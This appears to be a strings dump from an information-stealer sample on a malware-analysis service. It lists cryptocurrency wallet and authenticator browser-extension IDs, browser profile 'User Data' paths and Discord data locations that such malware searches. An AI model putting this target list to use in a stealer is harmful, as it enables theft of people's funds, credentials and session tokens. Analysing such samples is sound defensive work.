Pontem Aptos Wallet
ejjladinnckdgjemekebdpeokbikhfci
Petra Aptos Wallet
gojhcdgcpbpfigcaejpfhfegekdgiblk
Opera Wallet
oeljdldpnmdbchonielidgobddffflal
EOS Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
GAuth Authenticator
amkmjjmmflddogmhpjloimipbofnfjih
Wombat
blnieiiffboillknjnepogjhkgnoapac
EQUALWallet
hpglfhgfnhbgpjdenjgmdgoeiappafln
dngmlblcodfobpdpecaadgfbcggfjfnm
Maiar DeFi Wallet
pdadjkfkgcafgbceimcpbkalnfnepbnk
KardiaChain
aeachknmefphepccionboohckonoeemg
coin98
aiifbnbfobpmeekipheeijimdpnlpgpp
kkpllkodjeloidieedojogacfhpaihoh
Eth and Polk Web3 Wallet
mcohilncbfahbmgdjkbpemcciiolgcge
OKX Wallet
mgffkfbidihjpoaomajlbgchddlicgpn
PaliWallet
aodkkagnadcbobfpggfnjeongemjbjca
Bolt X
fmblappgoiilbgafhjklehhfifbdocee
ForboleX
hmeobnfnfcmdkdcmlblgagmfpfboieaf
XDEFI Wallet
hcflpincpppdclinealmandijcmnkbgn
mnfifefkajgofkcjkemidiaecocnkjeh
TezBox
ookjlbkiijinhpmnjffcofjonbfbgaoc
Temple
jnkelfanjkeadonecabehalmbgpfodjm
hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase
fnnegphlobjdpkhecapkijjdkgcjhkib
Harmony
lpfcbjknijpeeillifnkikgncikgfhdo
kpfopkelmapcoipemfendmdcghnegimn
LiqualityWallet
aholpfdialjgjfhomihkjbmgjidlcdno
Exodus_E
bgpipimickeadkjlklgciifhnalhdjhe
GeroWallet
flpiciilemghbmfalicajoolhkkenfel
ICONex
kmhcihpebfmpgmihbkipmjlmmioameka
Eternl
nhnkbkgjikgcigadomkphalanndcapjk
CloverWallet
jnlgamecbpmbajjfhmmmlhejkemejdma
Braavos wallet
efbglgofoippbgcjepnhiblaibcnclgk
EMartian Aptos Wallet
imloifkgjagghnncjkhggdhalmcnfklk
Trezor Password Manager
chromeExtensions -
catch chromeExtensions
Discord
Local State
uCozMedia
uCozMedia\Uran\User Data
Vivaldi
Vivaldi\User Data
Kometa
Kometa\User Data
Elements Browser
Elements Browser\User Data
Orbitum
Orbitum\User Data
Dragon
Comodo\Dragon\User Data
Citrio
CatalinaGroup\Citrio\User Data
Coowon
Coowon\Coowon\User Data
liebao
liebao\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
Yandex
Yandex\YandexBrowser\User Data
NVIDIA
NVIDIA Corporation\NVIDIA GeForce Experience
Torch\User Data
ChromiumViewer
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
QIP Surf
QIP Surf\User Data
DiscordPTB
discordptb
DiscordDevelopment
discorddevelopment
Opera Software
Uran\User Data
Chromodo
Chromodo\User Data
Amigo\User\User Data
Chrome
Google\Chrome\User Data
Iridium
Iridium\User Data
Comodo
Comodo\User Data
K-Melon
K-Melon\User Data
ChromePlus
MapleStudio\ChromePlus\User Data
7Star\7Star\User Data
CentBrowser
CentBrowser\User Data
Mail.Ru\Atom\User Data
NetboxBrowser
NetboxBrowser\User Data
Sputnik
Sputnik\Sputnik\User Data
360Browser
360Browser\Browser\User Data
LocalPrefs.json
DiscordCanary
discordcanary
Chrome (x86)
Google(x86)\Chrome\User Data
Chedot
Chedot\User Data
Maxthon3
No antivirus signatures available.
No IRMA results available.